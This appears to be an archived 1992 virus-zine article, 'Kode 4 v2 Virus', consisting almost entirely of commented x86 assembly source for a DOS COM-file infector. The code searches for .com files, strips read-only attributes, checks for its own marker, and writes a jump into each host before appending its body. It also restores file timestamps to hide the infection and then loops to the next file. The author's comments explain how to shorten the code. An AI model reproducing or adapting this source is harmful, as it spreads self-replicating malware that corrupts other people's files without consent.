home *** CD-ROM | disk | FTP | other *** search
- ─────────═════════>>> Article From Evolution #2 - YAM '92
-
-
-
- Article Title: Kode 4 v2 Virus
-
- Author: Soltan Griss
-
-
-
-
-
- seg_a segment byte public
-
- assume cs:seg_a, ds:seg_a
-
-
-
-
-
- org 100h
-
- V_Length equ vend-vstart
-
- KODE4 proc far
-
- start label near
-
- db 0E9h,00h,00h
-
-
-
-
-
- vstart equ $
-
-
-
- mov si,100h ;get si to point to 100
-
- mov di,102h ;get di to point to 102
-
- lback: inc di ;increment di
-
- mov ax,word ptr [si] ;si is ponting to ax
-
- cmp word ptr [di],ax ;compare ax with di loc
-
- jne lback ;INE go back and inc di
-
-
-
-
-
- mov ax,word ptr [si+1]
-
- cmp ax,word ptr [di+1]
-
- je lout
-
- jmp lback
-
-
-
- lout: add di,3h ;jmp stored in the end
-
- sub di,(v_length+100h) ;+3 to get to end and -
-
- mov si,di ;
-
- ;**********************************************************************
-
- ;*
-
- ;* The above code can be re-written as follows...
-
- ;* The above idea, although it works is very long in code....
-
- ;* when DOS does a load and execute it pushes all registers the last
-
- ;* register to be pushed contains the file length. so just subtract
-
- ;* the current location
-
- ;**********************************************************************
-
- ;
-
- ;
-
- ;
-
- ;Host_Off: pop bp
-
- ; sub bp,offset host_off
-
- ; mov si,bp
-
- ;
-
- ;*** Before opening any file copy the original three bytes back to 100h
-
- ;*** Because they will get overwritten when you check any new files
-
- lea di,temp_buff
-
- add di,si
-
- mov ax,word ptr [di]
-
- mov cl,byte ptr [di+2]
-
- mov di,100h
-
- mov word ptr [di],ax
-
- mov byte ptr [di+2],cl
-
-
-
-
-
- mov ah,4Eh ;Find first Com file
-
- mov dx,offset filename ; offset of "*.com"
-
- add dx,si
-
- int 21h
-
- jnc back
-
- jmp done
-
- Back:
-
- mov ah,43h ;get rid of read only
-
- mov al,0
-
- mov dx,9eh
-
- int 21h
-
- mov ah,43h
-
- mov al,01
-
- and cx,11111110b
-
- int 21h
-
-
-
- mov ax,3D02h ;Open file for read/writing
-
- mov dx,9Eh ;get file name from file DTA
-
- int 21h
-
- jnc next
-
- jmp done
-
- next: mov bx,ax ;save handle in bx
-
- mov ah,57h ;get time date
-
- mov al,0
-
- int 21h
-
-
-
- push cx ;put in stack for later
-
- push dx
-
-
-
- mov ax,4200h ; Move ptr to start of file
-
- xor cx,cx
-
- xor dx,dx
-
- int 21h
-
-
-
-
-
- mov ah,3fh ;load first 3 bytes
-
- mov cx,3
-
-
-
- mov dx,offset temp_buff
-
- add dx,si
-
- int 21h
-
-
-
- xor cx,cx ;move file pointer to end of file
-
- xor dx,dx
-
- mov ax,4202h
-
- int 21h
-
- sub ax,3 ; Fix for real location
-
- push ax
-
- ; nop ;
-
- ; nop ; used for debugging
-
- ; nop ;
-
- ; nop ;
-
- ; nop
-
-
-
- mov di,offset temp_buff
-
- add di,si
-
- mov word ptr [j_code2+si],ax; Save two bytes in a
-
- ; word [jumpin]
-
-
-
- cmp byte ptr [di],0e9h ;look for a jmp at begining
-
- jne infect
-
-
-
- mov cx,word ptr [di+1] ;check for XXX bytes at end
-
- pop ax
-
- sub ax,v_length
-
- cmp ax, cx ; jump (id string to check)
-
- jne infect
-
- jmp finish
-
-
-
-
-
-
-
- infect:
-
-
-
- xor cx,cx ;move file pointer to begining
-
- xor dx,dx ;to write jump
-
- mov ax,4200h
-
- int 21h
-
-
-
- mov ah,40h ;write jump in first 3 bytes
-
- mov cx,3
-
- mov dx, offset j_code1
-
- add dx,si
-
- int 21h
-
-
-
- xor cx,cx ;move file pointer to end of file
-
- xor dx,dx
-
- mov ax, 4202h
-
- int 21h
-
-
-
- mov dx,offset vstart
-
- add dx,si ;Start writing at top of virus
-
- mov cx,(vend-vstart) ; Set for length of virus
-
- mov ah,40h ;Write Data into the file
-
- int 21h
-
-
-
-
-
- Finish: pop dx ;Restore old dates and times
-
- pop cx
-
- mov ah,57h
-
- mov al,01h
-
- int 21h
-
-
-
- mov ah,3Eh ;Close the file
-
- int 21h
-
-
-
- mov ah,4Fh ;Find Next file
-
- int 21h
-
- jc done
-
- jmp back
-
-
-
- done:
-
- mov bp,100h
-
- jmp bp
-
-
-
-
-
- filename db "*.com",0
-
- DATA db " -=+ Kode4 +=-, The one and ONLY!$"
-
-
-
- j_code1 db 0e9h
-
- j_code2 db 00h,00h
-
- temp_buff db 0cdh,020h,090h ; CD 20 NOP
-
- kode4 endp
-
-
-
- vend equ $
-
-
-
- seg_a ends
-
-
-
- end start
-
-
-
-
-
-
